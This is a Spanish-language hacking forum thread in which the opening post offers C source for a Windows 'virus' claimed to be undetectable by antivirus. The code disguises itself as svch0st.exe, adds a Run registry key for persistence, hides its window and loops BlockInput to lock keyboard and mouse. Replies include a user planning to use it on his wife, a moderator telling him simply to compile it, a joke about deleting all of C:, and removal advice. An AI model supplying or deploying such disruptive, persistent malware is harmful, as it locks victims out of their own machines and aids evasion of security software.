comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Programa un virus en C sin ser detectado por nada "Source"

  • 11 Respuestas
  • 13284 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Dr0B4ck

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 0
  • Todos somos muy ignorantes. Lo que ocurre es que no todos ignoramos las mismas cosas...
    • MSN Messenger - dr0b4ck@hotmail.com
    • AOL Instant Messenger - dr0b4ck@hotmail.com
    • Yahoo Instant Messenger - dr0b4ck@hotmail.com
    • Ver Perfil
    • dr0b4ck-lab
« en: Noviembre 21, 2011, 11:56:48 pm »
Buenas Underc0de, sean bienvenidos a mi post, esta vez estare enseñando como crear un programa o virus, como ustedes lo quieran llamar, que bloquea el sistema, el raton y el teclado, solo tienen que añadirlo al inicio en el registro y todo esto sin ser detectado por ningun AntiVirus.

Código: C
  1. #include <windows.h>
  2. #include <tlhelp32.h>
  3. #include <winable.h>
  4.  
  5.  
  6. #define BUFSIZE 80
  7.  
  8. int test_key(void);
  9. int create_key(char *);
  10.  
  11.  
  12.  
  13. int main(void)
  14. {
  15. int test,create;
  16. test=test_key();
  17.  
  18. if (test==2)
  19. {
  20. char *path="c:\\WINDOWS\\svch0st.exe";
  21. create=create_key(path);
  22.  
  23. }
  24.  
  25. HWND inv;
  26. AllocConsole();
  27. inv=FindWindowA("ConsoleWindowClass",NULL);
  28. ShowWindow(inv,0);
  29. int c;
  30.  
  31. for(;;)
  32. {
  33. BlockInput(true);
  34. }
  35. char root[60]="C:\\Windows\\";
  36. char nombre[60]="svch0st";
  37. char path[256]="svch0st";
  38. No tienes permisos para ver links. Registrate o Entra con tu cuenta(nombre,".exe");
  39. No tienes permisos para ver links. Registrate o Entra con tu cuenta(root,nombre);
  40. HMODULE copiar = GetModuleHandle(0);
  41. GetModuleFileName(copiar, path, 256);
  42. CopyFile(path,root,false);
  43. }
  44.  
  45. int test_key(void)
  46. {
  47. int check;
  48. HKEY hKey;
  49. char path[BUFSIZE];
  50. DWORD buf_length=BUFSIZE;
  51. int reg_key;
  52.  
  53. reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
  54. if(reg_key!=0)
  55. {
  56. check=1;
  57. return check;
  58. }
  59.  
  60. reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);
  61.  
  62. if((reg_key!=0)||(buf_length>BUFSIZE))
  63. check=2;
  64. if(reg_key==0)
  65. check=0;
  66.  
  67. RegCloseKey(hKey);
  68. return check;
  69. }
  70.  
  71. int create_key(char *path)
  72. {
  73. int reg_key,check;
  74.  
  75. HKEY hkey;
  76.  
  77. reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  78. if(reg_key==0)
  79. {
  80. RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,No tienes permisos para ver links. Registrate o Entra con tu cuenta(path));
  81. check=0;
  82. return check;
  83. }
  84. if(reg_key!=0)
  85. check=1;
  86.  
  87. return check;
  88.  
  89. }


By Darax.
« Última modificación: Agosto 24, 2015, 06:36:04 am por rollth »
[♠] [♦] [♣] [♥] カřθBમčאּ[♠] [♦] [♣] [♥]

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
« Respuesta #1 en: Noviembre 22, 2011, 12:27:10 am »
By Darax.

Esto que acabas de hacer es de muy mal gusto, jamas te robes los creditos de un codigo que no es tuyo y mucho menos si no sabes ni un poco de C

Desconectado Dr0B4ck

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 0
  • Todos somos muy ignorantes. Lo que ocurre es que no todos ignoramos las mismas cosas...
    • MSN Messenger - dr0b4ck@hotmail.com
    • AOL Instant Messenger - dr0b4ck@hotmail.com
    • Yahoo Instant Messenger - dr0b4ck@hotmail.com
    • Ver Perfil
    • dr0b4ck-lab
« Respuesta #2 en: Noviembre 22, 2011, 10:26:01 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
By Darax.

Esto que acabas de hacer es de muy mal gusto, jamas te robes los creditos de un codigo que no es tuyo y mucho menos si no sabes ni un poco de C

Me disculpo men es que se me olvido salu2 !!
[♠] [♦] [♣] [♥] カřθBમčאּ[♠] [♦] [♣] [♥]

Desconectado Merlin

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Merlin969
« Respuesta #3 en: Junio 02, 2013, 02:02:02 am »
no hay un codigo mas smple?
lo digo porque uso linux y no uso ninguna libreria relacionada con windows... siquiera podrias mencionar su pseudocodigo?

Desconectado D4rkC0d3r

  • *
  • Underc0der
  • Mensajes: 202
  • Actividad:
    0%
  • Reputación 0
  • \xeb\x16\x5e\x31\xd2\
    • Ver Perfil
    • Ethical Hacking, Malware Analysis, Disinfection Techniques and more...
« Respuesta #4 en: Junio 02, 2013, 02:14:10 am »
Gracias por el aporte, a revisar que tal va.....

Saludos!!  :)

D4rkC0d3r

Desconectado eternalwolf

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Mayo 29, 2015, 08:46:25 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
no hay un codigo mas smple?
lo digo porque uso linux y no uso ninguna libreria relacionada con windows... siquiera podrias mencionar su pseudocodigo?

lo que hace el programa es manipular el registro de windows, pero lo mas importante a resaltar es esto

 
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
for(;;)
{
BlockInput(true);
}

un ciclo infinito que prohibe la entrada de datos raton y teclado, que funcione o no, no estoy seguro, no me gustaria probarlo xd.

Desconectado EPARA

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Junio 15, 2015, 01:24:15 am »
Amigo disculpa mi ignorancia, pues apenas voy comenzando el primer semestre de ingenieria de sistemas, como hacemos que ese virus funciones? es decir hay que guardarlo bajo una extension en especifico en el block de nota o que? orientame por favor... Ah y por cierto como casi todo mal tiene cura; hay una manera de revertir el efecto de este virus, es para bromear con mi esposa y jugarle un ratro pero sin hacerle daño a su informacion...

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #7 en: Junio 15, 2015, 01:36:40 am »
Si quieres jugar con tu esposa y hacerle pasar el rato, elimina todo el C:/ con permisos de administrador.

Ya enserio, si eres persona casada y quieres hacer este tipo de jueguitos, dejame decirte que pareces mas un niño inmaduro, revisa como compilar que es C? minimamente sabes que es ello, andas comenzando investiga ;).

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« Respuesta #8 en: Junio 27, 2015, 11:54:58 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Amigo disculpa mi ignorancia, pues apenas voy comenzando el primer semestre de ingenieria de sistemas, como hacemos que ese virus funciones? es decir hay que guardarlo bajo una extension en especifico en el block de nota o que? orientame por favor... Ah y por cierto como casi todo mal tiene cura; hay una manera de revertir el efecto de este virus, es para bromear con mi esposa y jugarle un ratro pero sin hacerle daño a su informacion...

Simplemente copia el código en tu entorno y compilalo.

Investiga un poco, pues compilar en C es muy simple, te dejo algo que quizás te sirva de ayuda: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Un saludo.



Desconectado fernando0101

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Junio 29, 2016, 06:10:25 pm »
 :) :'(  ;D Hola,  cómo se desactiva el virus, o no se puede?

« Última modificación: Junio 30, 2016, 04:45:19 pm por Gabriela »

Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2668
  • Actividad:
    1.67%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #10 en: Junio 30, 2016, 04:33:13 am »
Citar
:) :'(  ;D Hola,  cómo se desactiva el virus, o no se puede?

Si te fijas en el code verás que se añade al registro de Windows

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey
Solamente elimina la entrada del arranque y listo.

Saludos
« Última modificación: Junio 30, 2016, 04:46:22 pm por Gabriela »

Desconectado fernando0101

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Julio 01, 2016, 06:28:35 pm »
gracias ese es un rasonmaware

 

¿Te gustó el post? COMPARTILO!



[APORTE] Programa que hace que tiemble el mouse

Iniciado por binary112

Respuestas: 3
Vistas: 1504
Último mensaje Mayo 23, 2018, 02:30:27 am
por Mr.Tru
[Reto en C] Programa que calcule la potencia de un numero

Iniciado por Crod1K

Respuestas: 2
Vistas: 6103
Último mensaje Abril 12, 2013, 12:46:51 am
por 85
Programa en C ; Apaga el PC

Iniciado por Den udode

Respuestas: 7
Vistas: 5427
Último mensaje Febrero 03, 2016, 07:10:01 am
por Ominous
[Source] Juego de Formula 1 en C

Iniciado por wizardsec

Respuestas: 3
Vistas: 2463
Último mensaje Marzo 28, 2017, 06:23:04 pm
por Mr.Tru